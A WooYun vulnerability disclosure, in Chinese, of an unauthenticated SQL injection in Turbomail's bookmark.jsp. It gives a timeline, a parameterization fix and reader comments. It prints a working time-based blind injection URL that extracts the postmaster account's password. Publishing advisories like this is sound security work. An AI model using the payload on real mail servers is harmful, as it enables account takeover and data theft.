当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126135

漏洞标题:Turbomail sql注入漏洞

相关厂商:turbomail.org

漏洞作者: Noxxx

提交时间:2015-07-13 10:01

修复时间:2015-10-16 10:03

公开时间:2015-10-16 10:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-18: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

如标题

详细说明:

文件名:bookmark.jsp

QQ截图20150711015016.png


这里传入了bookmarkselect参数我们跟进去看看。

QQ截图20150711015306.png


看吧。。直接拼接到sql字符串中,而不是参数化,就直接送入查询,所以我们可以造成sql注入并且无需登录。

漏洞证明:

QQ截图20150711014802.png


判断第一位是不是Y如果是那么就延迟一秒时间,我们在随便打一个看看返回多少

QQ截图20150711014926.png


看吧 第一位不为W,比刚刚少一秒时间。
poc测试:
http://127.0.0.1:8080/bookmark.jsp?command=delete&bookmarkselect=288888889) AND (SELECT * FROM (SELECT SLEEP(MID(tpassword,1,1)='Y') FROM accountutil WHERE username='postmaster')X

修复方案:

参数化。
这个也可以删除任意t_bookmark表里的任意数据,并木有验证。

版权声明:转载请注明来源 Noxxx@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-16 10:03

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-08-16:本漏洞已经在更新补丁中修复


漏洞评价:

评论

  1. 2015-07-13 10:04 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    昨晚3点准备提交这个邮件的,和另一个cms全版本通杀getshell,结果先提交了机锋网的sqlzhuru然后睡觉了。。

  2. 2015-07-13 10:31 | #6c6c6c ( 普通白帽子 | Rank:291 漏洞数:47 | 像一条狗孤独的活着,渴望的活着,绝望的活...)

    @黑暗游侠 我前天就提了,没审,估计洞主比较早。

  3. 2015-07-13 10:33 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @#6c6c6c 嗯嗯